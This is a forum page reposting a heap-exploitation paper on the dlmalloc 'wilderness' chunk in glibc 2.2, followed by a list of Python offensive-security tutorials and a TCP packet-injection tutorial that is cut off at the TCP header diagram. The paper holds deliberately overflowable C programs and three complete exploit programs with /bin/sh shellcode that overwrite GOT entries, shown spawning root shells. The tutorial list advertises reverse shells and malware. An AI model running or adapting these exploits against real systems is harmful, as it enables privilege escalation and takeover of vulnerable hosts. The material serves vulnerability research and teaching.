Everything posted by Nytro

  1. Exploiting The Wilderness

by Phantasmal Phantasmagoria
phantasmal@hush.ai

---- Table of Contents -------------

1 - Introduction
    1.1 Prelude
    1.2 The wilderness
2 - Exploiting the wilderness
    2.1 Exploiting the wilderness with malloc()
    2.2 Exploiting the wilderness with an off-by-one
3 - The wilderness and free()
4 - A word on glibc 2.3
5 - Final thoughts

------------------------------------

---- Introduction ------------------

---- Prelude

This paper outlines a method of exploiting heap overflows on dlmalloc-based glibc 2.2 systems. In situations where an overflowable buffer is contiguous to the wilderness it is possible to achieve the aa4bmo primitive [1].

This article is written with an x86/Linux target in mind. It is assumed the reader is familiar with the dlmalloc chunk format and the traditional methods of exploiting dlmalloc-based overflows [2][3]. It may be worthwhile to obtain a copy of the complete dlmalloc source code from glibc itself, as the excerpts below are simplified and may lose a degree of context.

---- The wilderness

The wilderness is the top-most chunk in allocated memory. It is similar to any normal malloc chunk - it has a chunk header followed by a variably long data section. The important difference lies in the fact that the wilderness, also called the top chunk, borders the end of available memory and is the only chunk that can be extended or shortened. This means it must be treated specially to ensure it always exists; it must be preserved.
The wilderness is only used when a call to malloc() requests memory of a size that no other freed chunk can satisfy. If the wilderness is sufficiently large to handle the request it is split in two, one part being returned for the call to malloc(), and the other becoming the new wilderness. In the event that the wilderness is not large enough to handle the request, it is extended with sbrk() and split as described above. This behaviour means that the wilderness will always exist, and furthermore, that its data section will never be used. This is called wilderness preservation, and as such the wilderness is treated as the last resort in allocating a chunk of memory [4]. Consider the following example:

    /* START wilderness.c */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char *first, *second;

        first = (char *) malloc(1020);          /* [A] */
        strcpy(first, argv[1]);                 /* [B] */

        second = (char *) malloc(1020);         /* [C] */
        strcpy(second, "polygoria!");

        printf("%p | %s\n", first, second);
    }
    /* END wilderness.c */

It can be logically deduced that, since no previous calls to free() have been made, our malloc() requests are going to be serviced by the existing wilderness chunk. The wilderness is split in two at [A]: one chunk of 1024 bytes (1020 + 4 for the size field) becomes the 'first' buffer, while the remaining space is used for the new wilderness. The same process happens again at [C].

Keep in mind that the prev_size field is not used by dlmalloc if the previous chunk is allocated, and in that situation can become part of the data of the previous chunk to decrease wastage. The wilderness chunk does not utilize prev_size (there is no possibility of the top chunk being consolidated), meaning it is included at the end of the 'first' buffer at [A] as part of its 1020 bytes of data. Again, the same applies to the 'second' buffer at [C].
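The 1020-to-1024 rounding above follows dlmalloc's request-to-chunk-size conversion on 32-bit systems: add 4 bytes for the size field and round up to a multiple of 8, with a floor of MINSIZE. A small sketch of that arithmetic (the helper name request2size mirrors the dlmalloc macro, but this is an illustrative reimplementation, not the library's code):

```python
# Sketch of dlmalloc's request-to-chunk-size rounding on 32-bit:
# add SIZE_SZ (4) bytes for the size field, round up to a multiple
# of 8, and never go below MINSIZE (16).
SIZE_SZ = 4
MINSIZE = 16

def request2size(req):
    nb = (req + SIZE_SZ + 7) & ~7
    return max(nb, MINSIZE)

print(request2size(1020))  # 1024: exactly contiguous to the wilderness
print(request2size(2020))  # 2024: the second request used later on
```

This is why a request for 1020 bytes consumes exactly 1024 bytes of the wilderness, leaving the overflowable buffer flush against the top chunk's header.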
The special handling of the wilderness chunk by the dlmalloc system led Michel "MaXX" Kaempf to state in his 'Vudo malloc tricks' [2] article: "The wilderness chunk is one of the most dangerous opponents of the attacker who tries to exploit heap mismanagement". It is this special handling of the wilderness that we will be manipulating in our exploits, turning the dangerous opponent into, perhaps, an interesting conquest.

------------------------------------

---- Exploiting the wilderness -----

---- Exploiting the wilderness with malloc()

Looking at our sample code above we can see that a typical buffer overflow exists at [B]. However, in this situation we are unable to use the traditional unlink technique, due to the overflowed buffer being contiguous to the wilderness and the lack of a relevant call to free(). This leaves us with the second call to malloc() at [C] - we will be exploiting the special code used to set up our 'second' buffer from the wilderness.

Based on the knowledge that the 'first' buffer borders the wilderness, it is clear that not only can we control the prev_size and size elements of the top chunk, but also a considerable amount of space after the chunk header. This space is the top chunk's unused data area and proves crucial in forming a successful exploit. Let's have a look at the important chunk_alloc() code called from our malloc() requests:

    /* Try to use top chunk */

    /* Require that there be a remainder, ensuring top always exists */
    if ((remainder_size = chunksize(top(ar_ptr)) - nb) < (long)MINSIZE)  /* [A] */
    {
        ...
        malloc_extend_top(ar_ptr, nb);
        ...
    }

    victim = top(ar_ptr);
    set_head(victim, nb | PREV_INUSE);
    top(ar_ptr) = chunk_at_offset(victim, nb);
    set_head(top(ar_ptr), remainder_size | PREV_INUSE);
    return victim;

This is the wilderness chunk code. It checks whether the wilderness is large enough to service a request of nb bytes, then splits and recreates the top chunk as described above.
If the wilderness is not large enough to hold the minimum size of a chunk (MINSIZE) after nb bytes are used, the heap is extended using malloc_extend_top():

    mchunkptr old_top = top(ar_ptr);
    INTERNAL_SIZE_T old_top_size = chunksize(old_top);  /* [B] */
    char *brk;
    ...
    char *old_end = (char*)(chunk_at_offset(old_top, old_top_size));
    ...
    brk = sbrk(nb + MINSIZE);  /* [C] */
    ...
    if (brk == old_end)  /* [D] */
    {
        ...
        old_top = 0;
    }
    ...
    /* Setup fencepost and free the old top chunk. */
    if (old_top)  /* [E] */
    {
        old_top_size -= MINSIZE;
        set_head(chunk_at_offset(old_top, old_top_size + 2*SIZE_SZ), 0|PREV_INUSE);
        if (old_top_size >= MINSIZE)  /* [F] */
        {
            set_head(chunk_at_offset(old_top, old_top_size), (2*SIZE_SZ)|PREV_INUSE);
            set_foot(chunk_at_offset(old_top, old_top_size), (2*SIZE_SZ));
            set_head_size(old_top, old_top_size);
            chunk_free(ar_ptr, old_top);
        }
        else
        {
            ...
        }
    }

The above is a simplified version of malloc_extend_top() containing only the code we are interested in. We can see the wilderness being extended at [C] with the call to sbrk(), but more interesting is the chunk_free() request in the 'fencepost' code. A fencepost is a space of memory set up for checking purposes [5]. In the case of dlmalloc they are relatively unimportant, but the code above provides the crucial element in exploiting the wilderness with malloc(). The call to chunk_free() gives us a glimpse, a remote possibility, of using the unlink() macro in a nefarious way. As such, the chunk_free() call is looking very interesting.

However, there are a number of conditions that we have to meet in order to reach the chunk_free() call reliably. Firstly, we must ensure that the if statement at [A] returns true, forcing the wilderness to be extended. Once in malloc_extend_top(), we have to trigger the fencepost code at [E]. This can be done by avoiding the if statement at [D]. Finally, we must handle the inner if statement at [F] leading to the call to chunk_free().
One other problem arises in the form of the set_head() and set_foot() calls. These could potentially destroy important data in our attack, so we must include them in our list of things to be handled. That leaves us with four items to consider just in getting to the fencepost chunk_free() call. Fortunately, all of these issues can be solved with one solution. As discussed above, we can control the wilderness' chunk header, essentially giving us control of the values returned from chunksize() at [A] and [B]. Our solution is to set the overflowed size field of the top chunk to a negative value. Let's look at why this works:

- A negative size field would trigger the first if statement at [A]. This is because remainder_size is signed, and when set to a negative number it still evaluates to less than MINSIZE.

- The altered size element would be used for old_top_size, meaning the old_end pointer would appear somewhere other than the actual end of the wilderness. This means the if statement at [D] returns false and the fencepost code at [E] is run.

- The old_top_size variable is unsigned and would appear to be a large positive number when set to our negative size field. This means the statement at [F] returns true, as old_top_size evaluates to be much greater than MINSIZE.

- The potentially destructive chunk-header-modifying calls would only corrupt unimportant padding within our overflowed buffer, as the negative old_top_size is used for an offset.

Finally, we can reach our call to chunk_free(). Let's look at the important bits:

    INTERNAL_SIZE_T hd = p->size;
    ...
    if (!(hd & PREV_INUSE))  /* consolidate backward */  /* [A] */
    {
        prevsz = p->prev_size;
        p = chunk_at_offset(p, -(long)prevsz);  /* [B] */
        sz += prevsz;

        if (p->fd == last_remainder(ar_ptr))
            islr = 1;
        else
            unlink(p, bck, fwd);
    }

The call to chunk_free() is made on old_top (our overflowed wilderness), meaning we can control p->prev_size and p->size.
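The signed/unsigned dual reading of the overflowed size field described above can be sanity-checked in a few lines. This is an illustrative sketch (nb is the rounded second request of 1024 bytes), not the library code itself:

```python
import struct

# The same 32-bit pattern reads differently depending on signedness.
# Our overflowed top-chunk size is 0xfffffff0, i.e. -16 as a signed int.
size = 0xfffffff0
as_signed = struct.unpack('<i', struct.pack('<I', size))[0]
assert as_signed == -16

MINSIZE = 16
nb = 1024  # the second 1020-byte request, rounded up

# [A] remainder_size is signed: negative, so it is always < MINSIZE,
# forcing malloc_extend_top() to run.
remainder_size = as_signed - nb
assert remainder_size < MINSIZE

# [F] old_top_size is unsigned: the same bits minus MINSIZE are a huge
# positive number, so the fencepost chunk_free() is reached.
old_top_size = (size - MINSIZE) & 0xffffffff
assert old_top_size >= MINSIZE
```

One value thus satisfies all four requirements at once, which is why -16 is chosen for the overflowed size field.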
Backward consolidation is normally used to merge two free chunks together, but we will be using it to trigger the unlink() bug. Firstly, we need to ensure the backward consolidation code is run at [A]. As we can control p->size, we can trigger backward consolidation simply by clearing the overflowed size element's PREV_INUSE bit. From here, it is p->prev_size that becomes important. As mentioned above, p->prev_size is actually part of the buffer we're overflowing.

Exploiting dlmalloc by using backward consolidation was briefly considered in the article 'Once upon a free()' [3]. The author suggests that it is possible to create a 'fake chunk' within the overflowed buffer - that is, a fake chunk relatively negative to the overflowed chunk header. This would require setting p->prev_size to a small positive number, which in turn gets complemented into its negative counterpart at [B] (digression: please excuse my stylistic habit of replacing the more technically correct "two's complement" with "complement"). However, such a small positive number would likely contain NULL terminating bytes, effectively ending our payload before the rest of the overflow is complete.

This leaves us with one other choice: creating a fake chunk relatively positive to the start of the wilderness. This can be achieved by setting p->prev_size to a small negative number, turned into a small positive number at [B]. This would require the specially crafted forward and back pointers to be situated at the start of the wilderness' unused data area, just after the chunk header. Similar to the overflowed size variable discussed above, this is convenient as the negative number need not contain NULL bytes, allowing us to continue the payload into the data area. For the sake of the exploit, let's go with a prev_size of -4 or 0xfffffffc and an overflowed size of -16 or 0xfffffff0.
Clearly, our prev_size will get turned into an offset of 4, essentially passing the point 4 bytes past the start of the wilderness (the start being the prev_size element itself) to the unlink() macro. This means that our fake fwd pointer will be at the wilderness + 12 bytes and our bck pointer at the wilderness + 16 bytes. An overflowed size of -16 places the chunk-header-modifying calls safely into our padding, while still satisfying all of our other requirements. Our payload will look like this:

|...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPPPP|SSSSWWWWFFFFBBBBWWWWWWWW...|

A = Target buffer that we control. Some of this will be trashed by the
    chunk-header-modifying calls, important when considering shellcode
    placement.
P = The prev_size element of the wilderness chunk. This is part of our
    target buffer. We set it to -4.
S = The overflowed size element of the wilderness chunk. We set it to -16.
W = Unimportant parts of the wilderness.
F = The fwd pointer for the call to unlink(). We set it to the target
    return location - 12.
B = The bck pointer for the call to unlink(). We set it to the return
    address.

We're now ready to write our exploit for the vulnerable code discussed above. Keep in mind that a malloc request for 1020 is padded up to 1024 to contain room for the size field, so we are exactly contiguous to the wilderness.

    $ gcc -o wilderness wilderness.c
    $ objdump -R wilderness | grep printf
    08049650 R_386_JUMP_SLOT   printf
    $ ./wilderness 123
    0x8049680 | polygoria!
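Before the exploit itself, the effect of the fake chunk can be simulated. The sketch below emulates the two writes the glibc 2.2 unlink() macro performs (FD->bk = BK; BK->fd = FD, with fd at chunk offset 8 and bk at offset 12) using a dictionary as stand-in memory; the wilderness address is made up purely for illustration:

```python
# Simulate the unlink() writes triggered by a prev_size of -4.
RETLOC  = 0x08049650          # GOT entry of printf (from objdump)
RETADDR = 0x08049680          # start of the 'first' buffer data

wilderness = 0x1000           # illustrative address of the top chunk
# chunk_at_offset(p, -(long)-4) moves 4 bytes forward:
fake_chunk = wilderness + 4
fd_at = fake_chunk + 8        # = wilderness + 12: our fake fwd pointer
bk_at = fake_chunk + 12       # = wilderness + 16: our fake bck pointer

mem = {fd_at: RETLOC - 12, bk_at: RETADDR}

# unlink(): FD = P->fd; BK = P->bk; FD->bk = BK; BK->fd = FD;
FD, BK = mem[fd_at], mem[bk_at]
mem[FD + 12] = BK             # (RETLOC - 12) + 12 = RETLOC, now RETADDR
mem[BK + 8]  = FD             # trashes the word at RETADDR + 8

assert mem[RETLOC] == RETADDR
assert mem[RETADDR + 8] == RETLOC - 12
```

The second write is why the exploit below starts its payload with a short jump over the trashed word at offset 8 of the return address.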
    /* START exploit.c */
    #include <string.h>
    #include <stdlib.h>
    #include <unistd.h>

    #define RETLOC  0x08049650  /* GOT entry for printf */
    #define RETADDR 0x08049680  /* start of 'first' buffer data */

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    int main(int argc, char *argv[])
    {
        char *p, *payload = (char *) malloc(1052);

        p = payload;
        memset(p, '\x90', 1052);

        /* Jump 12 ahead over the trashed word from unlink() */
        memcpy(p, "\xeb\x0c", 2);

        /* We put the shellcode safely away from the possibly
         * corrupted area */
        p += 1020 - 64 - sizeof(shellcode);
        memcpy(p, shellcode, sizeof(shellcode) - 1);

        /* Set up the prev_size and overflowed size fields */
        p += sizeof(shellcode) + 64 - 4;
        *(long *) p = -4;
        p += 4;
        *(long *) p = -16;

        /* Set up the fwd and bck of the fake chunk */
        p += 8;
        *(long *) p = RETLOC - 12;
        p += 4;
        *(long *) p = RETADDR;
        p += 4;
        *(p) = '\0';

        execl("./wilderness", "./wilderness", payload, NULL);
    }
    /* END exploit.c */

    $ gcc -o exploit exploit.c
    $ ./exploit
    sh-2.05a#

---- Exploiting the wilderness with an off-by-one

Let's modify our original vulnerable code to contain an off-by-one condition:

    /* START wilderness2.c */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char *first, *second;
        int x;

        first = (char *) malloc(1020);
        for (x = 0; x <= 1020 && argv[1][x] != '\0'; x++)  /* [A] */
            first[x] = argv[1][x];

        second = (char *) malloc(2020);  /* [B] */
        strcpy(second, "polygoria!");

        printf("%p %p | %s\n", first, argv[1], second);
    }
    /* END wilderness2.c */

Looking at this sample code we can see the off-by-one error occurring at [A]. The loop copies 1021 bytes of argv[1] into a buffer, 'first', allocated only 1020 bytes. As the 'first' buffer was split off the top chunk in its allocation, it is exactly contiguous to the wilderness.
This means that our one-byte overflow destroys the least significant byte of the top chunk's size field. When exploiting off-by-one conditions involving the wilderness we will use a technique similar to that discussed above in the malloc() section; we want to trigger malloc_extend_top() in the second call to malloc() and use the fencepost code to cause an unlink() to occur. However, a couple of important issues arise in addition to those discussed above.

The first new problem is found in trying to trigger malloc_extend_top() from the wilderness code in chunk_alloc(). In order to force the heap to extend, the size of the wilderness minus the size of our second request (2020) needs to be less than 16. When we controlled the entire size field in the section above this was not a problem, as we could easily set a value less than 16, but since we can only control the least significant byte of the wilderness' size field we can only decrease the size by a limited amount. This means that in some situations where the wilderness is too big we cannot trigger the heap extension code. Fortunately, it is common in real world situations to have some sort of control over the size of the wilderness through attacker-induced calls to malloc().

Assuming that our larger second request to malloc() will attempt to extend the heap, we now have to address the other steps in reaching the fencepost chunk_free() call. We know that we can comfortably reach the fencepost code, as we are modifying the size element of the wilderness. The inner if statement leading to the chunk_free() is usually triggered, as either our old_top_size is greater than 16, or the wilderness' size is small enough that controlling the least significant byte is enough to make old_top_size wrap around when MINSIZE is subtracted from it. Finally, the chunk-header-modifying calls are unimportant, so long as they occur in allocated memory so as to avoid a premature segfault.
The reason for this will become clear shortly. All we have left to do is to ensure that the PREV_INUSE bit is cleared for backward consolidation at the chunk_free(). This is made trivial by our control of the size field.

Once again, as we reach the backward consolidation code it is the prev_size field that becomes important. We have already determined that we have to use a negative prev_size value to ensure our payload is not terminated by stray NULL bytes. The negative prev_size field causes the backward consolidation chunk_at_offset() call to use a positive offset from the start of the wilderness. However, unlike the situation above, we do not control any of the wilderness after the overflowed least significant byte of the size field. Knowing that we can only go forward in memory at the consolidation, and that we don't have any leverage on the heap, we have to shift our attention to the stack.

The stack may initially seem to be an unlikely factor when considering a heap overflow, but in our case, where we can only increase the values passed to unlink(), it becomes quite convenient, especially in a local context. Stack addresses are much higher in memory than their heap counterparts, and by correctly setting the prev_size field of the wilderness we can force an unlink() to occur somewhere on the stack. That somewhere will be our payload as it sits in argv[1]. Using this heap-to-stack unlink() technique, any possible corruption of our payload in the heap by the chunk-header-modifying calls is inconsequential to our exploit; the heap is only important in triggering the actual overflow, while the values for unlink() and the execution of our shellcode can be handled on the stack.

The correct prev_size value can be easily calculated when exploiting a local vulnerability. We can discover the address of both argv[1] and the 'first' buffer by simulating our payload and using the output of running the vulnerable program.
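With those two addresses recovered, the heap-to-stack prev_size arithmetic can be sketched as follows, using the addresses from the sample run of wilderness2 (the 8-byte adjustment lines the fake chunk's fd and bk up with the first two words of argv[1]):

```python
# Heap-to-stack prev_size arithmetic for the off-by-one exploit.
# Example addresses taken from the paper's sample run:
ARGV1 = 0xbffffac9            # start of argv[1] on the stack
FIRST = 0x080496b0            # start of the 'first' buffer

wilderness = FIRST + 1016     # end of 'first' minus 4 (prev_size)

# We want chunk_at_offset(p, -(long)prev_size) to land 8 bytes before
# argv[1], so the fake fd (chunk offset 8) falls exactly on the first
# word of our payload. Complement the distance, adding 8 first.
prev_size = (-(ARGV1 - wilderness) + 8) & 0xffffffff

fake_chunk = (wilderness + (-prev_size & 0xffffffff)) & 0xffffffff
assert fake_chunk == ARGV1 - 8
assert fake_chunk + 8 == ARGV1          # fwd pointer: first payload word
assert fake_chunk + 12 == ARGV1 + 4     # bck pointer: second payload word

# The resulting value contains no NUL bytes, so it survives strcpy-style
# copies into the payload.
assert all(b != 0 for b in prev_size.to_bytes(4, 'little'))
```

The same computation appears in exploit2.c below as prev_size = -(ARGV1 - (FIRST + 1016)) + 8.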
We also know that our prev_size will be complemented into a positive offset from the start of the wilderness. To reach argv[1] at the chunk_at_offset() call we merely have to subtract the address of the start of the wilderness (the end of the 'first' buffer minus 4 for prev_size) from the address of argv[1], then complement the result. This leaves us with the following payload:

|FFFFBBBBDDDDDDDDD...DDDDDDDDPPPP|SWWWWWWWWWWW...|

F = The fwd pointer for the call to unlink(). We set it to the target
    return location - 12.
B = The bck pointer for the call to unlink(). We set it to the return
    address.
D = Shellcode and NOP padding, where we will return in argv[1].
P = The prev_size element of the wilderness chunk, set to the value
    calculated as described above.
S = The overflowed byte in the size field of the wilderness. We set it
    to the lowest possible value that still clears PREV_INUSE, 2.
W = Unimportant parts of the wilderness.

    $ gcc -o wilderness2 wilderness2.c
    $ objdump -R wilderness2 | grep printf
    08049684 R_386_JUMP_SLOT   printf

    /* START exploit2.c */
    #include <string.h>
    #include <stdlib.h>
    #include <unistd.h>

    #define RETLOC 0x08049684  /* GOT entry for printf */
    #define ARGV1  0x01020304  /* start of argv[1], handled later */
    #define FIRST  0x04030201  /* start of 'first', also handled later */

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    int main(int argc, char *argv[])
    {
        char *p, *payload = (char *) malloc(1028);
        long prev_size;

        p = payload;
        memset(p, '\x90', 1028);
        *(p + 1021) = '\0';

        /* Set the fwd and bck for the call to unlink() */
        *(long *) p = RETLOC - 12;
        p += 4;
        *(long *) p = ARGV1 + 8;
        p += 4;

        /* Jump 12 ahead over the trashed word from unlink() */
        memcpy(p, "\xeb\x0c", 2);

        /* Put shellcode at end of NOP sled */
        p += 1012 - 4 - sizeof(shellcode);
        memcpy(p, shellcode, sizeof(shellcode) - 1);

        /* Set up the special prev_size field. We actually want to
         * end up pointing to 8 bytes before argv[1] to ensure the
         * fwd and bck are hit right, so we add 8 before
         * complementing. */
        prev_size = -(ARGV1 - (FIRST + 1016)) + 8;
        p += sizeof(shellcode);
        *(long *) p = prev_size;

        /* Allow for a test condition that will not segfault the
         * target when getting the address of argv[1] and 'first'.
         * With 0xff malloc_extend_top() returns early due to error
         * checking. 0x02 is used to trigger the actual overflow. */
        p += 4;
        if (argc > 1)
            *(char *) p = 0xff;
        else
            *(char *) p = 0x02;

        execl("./wilderness2", "./wilderness2", payload, NULL);
    }
    /* END exploit2.c */

    $ gcc -o exploit2 exploit2.c
    $ ./exploit2 test
    0x80496b0 0xbffffac9 | polygoria!
    $ cat > diffex
    6,7c6,7
    < #define ARGV1  0x01020304  /* start of argv[1], handled later */
    < #define FIRST  0x04030201  /* start of 'first', also handled later */
    ---
    > #define ARGV1  0xbffffac9  /* start of argv[1] */
    > #define FIRST  0x080496b0  /* start of 'first' */
    $ patch exploit2.c diffex
    patching file exploit2.c
    $ gcc -o exploit2 exploit2.c
    $ ./exploit2
    sh-2.05a#

------------------------------------

---- The wilderness and free() -----

Let's now consider the following example:

    /* START wilderness3a.c */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char *first, *second;

        first = (char *) malloc(1020);
        strcpy(first, argv[1]);
        free(first);

        second = (char *) malloc(1020);
    }
    /* END wilderness3a.c */

Unfortunately, this situation does not appear to be exploitable. When exploiting the wilderness, calls to free() are your worst enemy. This is because chunk_free() handles situations directly involving the wilderness with different code to the normal backward or forward consolidation. Although this special 'top' code has its weaknesses, it does not seem possible either to directly exploit the call to free(), or to survive it in a way that allows exploiting the following call to malloc().
For those interested, let's have a quick look at why:

    INTERNAL_SIZE_T hd = p->size;
    INTERNAL_SIZE_T sz;
    ...
    mchunkptr next;
    INTERNAL_SIZE_T nextsz;
    ...
    sz = hd & ~PREV_INUSE;
    next = chunk_at_offset(p, sz);
    nextsz = chunksize(next);  /* [A] */

    if (next == top(ar_ptr))
    {
        sz += nextsz;  /* [B] */

        if (!(hd & PREV_INUSE))  /* [C] */
        {
            ...
        }

        set_head(p, sz | PREV_INUSE);  /* [D] */
        top(ar_ptr) = p;
        ...
    }

Here we see the code from chunk_free() used to handle requests involving the wilderness. Note that the backward consolidation within the 'top' code at [C] is uninteresting, as we do not control the needed prev_size element. This leaves us with the hope of using the following call to malloc() as described above. In this situation we control the value of nextsz at [A]. We can see that the chunk being freed is consolidated with the wilderness. We can control the new wilderness' size, as it is adjusted with our nextsz at [B], but unfortunately, the PREV_INUSE bit is set at the call to set_head() at [D]. The reason this is a bad thing becomes clear when considering the possibilities of using backward consolidation in any future calls to malloc(): the PREV_INUSE bit needs to be cleared.

Keeping with the idea of exploiting the following call to malloc() using the fencepost code, there are a few other options - all of which appear to be impossible. Firstly, forward consolidation. This is made unlikely by the fencepost chunk-header-modifying calls discussed above, as they usually ensure that the test for forward consolidation will fail. The frontlink() macro has been discussed [2] as another possible method of exploiting dlmalloc, but since we do not control any of the traversed chunks this technique is uninteresting. The final option was to use the fencepost chunk-header-modifying calls to partially overwrite a GOT entry to point into an area of memory we control.
Unfortunately, all of these modifying calls are aligned, and there doesn't seem to be anything else we can do with the values we can write. Now that we have determined what is impossible, let's have a look at what we can do when involving the wilderness and free():

    /* START wilderness3b.c */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char *first, *second;

        first = (char *) malloc(1020);
        second = (char *) malloc(1020);

        strcpy(second, argv[1]);  /* [A] */

        free(first);   /* [B] */
        free(second);
    }
    /* END wilderness3b.c */

The general aim of this contrived example is to avoid the special 'top' code discussed above. The wilderness can be overflowed at [A], but this is directly followed by a call to free(). Fortunately, the chunk to be freed does not border the wilderness, and thus the 'top' code is not invoked. To exploit this we will be using forward consolidation at [B], the first call to free():

    /* consolidate forward */
    if (!(inuse_bit_at_offset(next, nextsz)))
    {
        sz += nextsz;

        if (!islr && next->fd == last_remainder(ar_ptr))
        {
            ...
        }
        else
            unlink(next, bck, fwd);

        next = chunk_at_offset(p, sz);
    }

At the first call to free(), 'next' points to our 'second' buffer. This means that the test for forward consolidation looks at the size value of the wilderness. To trigger the unlink() on our 'second' buffer we need to overflow the wilderness' size field to clear the PREV_INUSE bit. Our payload will look like this:

|FFFFBBBBDDDDDDDD...DDDDDDDD|SSSSWWWWWWWWWWWWWWWW...|

F = The fwd pointer for the call to unlink(). We set it to the target
    return location - 12.
B = The bck pointer for the call to unlink(). We set it to the return
    address.
D = Shellcode and NOP padding, where we will return.
S = The overflowed size field of the wilderness chunk. A value of -4
    will do.
W = Unimportant parts of the wilderness.

We're now ready for an exploit.
    $ gcc -o wilderness3b wilderness3b.c
    $ objdump -R wilderness3b | grep free
    0804962c R_386_JUMP_SLOT   free
    $ ltrace ./wilderness3b 1986 2>&1 | grep malloc | tail -n 1
    malloc(1020) = 0x08049a58

    /* START exploit3b.c */
    #include <string.h>
    #include <stdlib.h>
    #include <unistd.h>

    #define RETLOC  0x0804962c  /* GOT entry for free */
    #define RETADDR 0x08049a58  /* start of 'second' buffer data */

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    int main(int argc, char *argv[])
    {
        char *p, *payload = (char *) malloc(1052);

        p = payload;
        memset(p, '\x90', 1052);

        /* Set up the fwd and bck pointers to be unlink()'d */
        *(long *) p = RETLOC - 12;
        p += 4;
        *(long *) p = RETADDR + 8;
        p += 4;

        /* Jump 12 ahead over the trashed word from unlink() */
        memcpy(p, "\xeb\x0c", 2);

        /* Position shellcode safely at end of NOP sled */
        p += 1020 - 8 - sizeof(shellcode) - 32;
        memcpy(p, shellcode, sizeof(shellcode) - 1);

        p += sizeof(shellcode) + 32;
        *(long *) p = -4;
        p += 4;
        *(p) = '\0';

        execl("./wilderness3b", "./wilderness3b", payload, NULL);
    }
    /* END exploit3b.c */

    $ gcc -o exploit3b exploit3b.c
    $ ./exploit3b
    sh-2.05a#

------------------------------------

---- A word on glibc 2.3 -----------

Although exploiting our examples on a glibc 2.3 system would be an interesting activity, it does not appear possible to utilize the techniques described above. Specifically, although the fencepost code exists on both platforms, the situations surrounding it are vastly different. For those genuinely interested in a more detailed explanation of the difficulties involving the fencepost code on glibc 2.3, feel free to contact me.

------------------------------------

---- Final thoughts ----------------

For an overflow involving the wilderness to exist on a glibc 2.2 platform might seem a rare or esoteric occurrence.
However, the research presented above was not prompted by divine inspiration, but by a tangible need. Thus it was not so much important substance that inclined me to release this paper, but rather the hope that obscure substance might be reused for some creative good by another.

------------------------------------

[1] http://www.phrack.org/show.php?p=61&a=6
[2] http://www.phrack.org/show.php?p=57&a=8
[3] http://www.phrack.org/show.php?p=57&a=9
[4] http://gee.cs.oswego.edu/dl/html/malloc.html
[5] http://www.memorymanagement.org/glossary/f.html#fencepost

------------------------------------

Sursa: https://www.thc.org/root/docs/exploit_writing/Exploiting%20the%20wilderness.txt
  2. This tutorial series is designed for those who don't come from a programming background. Each tutorial covers common use cases for Python scripting geared toward InfoSec professionals, from "Hello World" to custom Python malware and exploits:

0x0 - Getting Started
0x1 - Port Scanner
0x2 - Reverse Shell
0x3 - Fuzzer
0x4 - Python to EXE
0x5 - Web Requests
0x6 - Spidering
0x7 - Web Scanning and Exploitation
0x8 - Whois Automation
0x9 - Command Automation
0xA - Python for Metasploit Automation
0xB - Pseudo-Terminal
0xC - Python Malware

Sursa: Python Tutorials - Primal Security Podcast
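As a taste of what the series covers, the "0x1 - Port Scanner" entry boils down to little more than socket.connect_ex() in a loop. A minimal sketch in that spirit (not the series' own code; the host and port range in the example are placeholders):

```python
import socket

# Minimal TCP connect scanner: connect_ex() returns 0 when the
# three-way handshake succeeds, i.e. when the port is open.
def scan(host, ports, timeout=0.5):
    open_ports = []
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        if s.connect_ex((host, port)) == 0:
            open_ports.append(port)
        s.close()
    return open_ports

# Example usage: scan("127.0.0.1", range(20, 1025))
```

A full connect() raises an exception on failure, so connect_ex(), which returns an error code instead, keeps the loop simple.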
  3. [h=1]TCP Packet Injection with Python[/h]

Packet injection is the process of interfering with an established network connection by constructing arbitrary protocol packets (TCP, UDP, ...) and sending them out through raw sockets. It is used widely in network penetration testing, for example in DDoS, TCP reset attacks and port scanning. A packet is a combination of an IP header, a TCP/UDP header and data:

Packet = IP Header + TCP/UDP Header + Data

Most operating systems that implement the socket API support packet injection, especially those based on Berkeley Sockets. Microsoft limited raw socket capabilities to packet sniffing after the Windows XP release. This tutorial is implemented on Unix-like operating systems.

[h=3]TCP Header[/h]

The TCP protocol is the most used transport protocol on the world wide web; it provides reliable, ordered and error-checked delivery of a stream of bytes between programs running on computers connected to a network.

     0                   1                   2                   3
     0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |          Source Port          |       Destination Port        |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |                        Sequence Number                        |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |                    Acknowledgment Number                      |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |  Data |           |U|A|P|R|S|F|                               |
    | Offset| Reserved  |R|C|S|S|Y|I|            Window             |
    |       |           |G|K|H|T|N|N|                               |
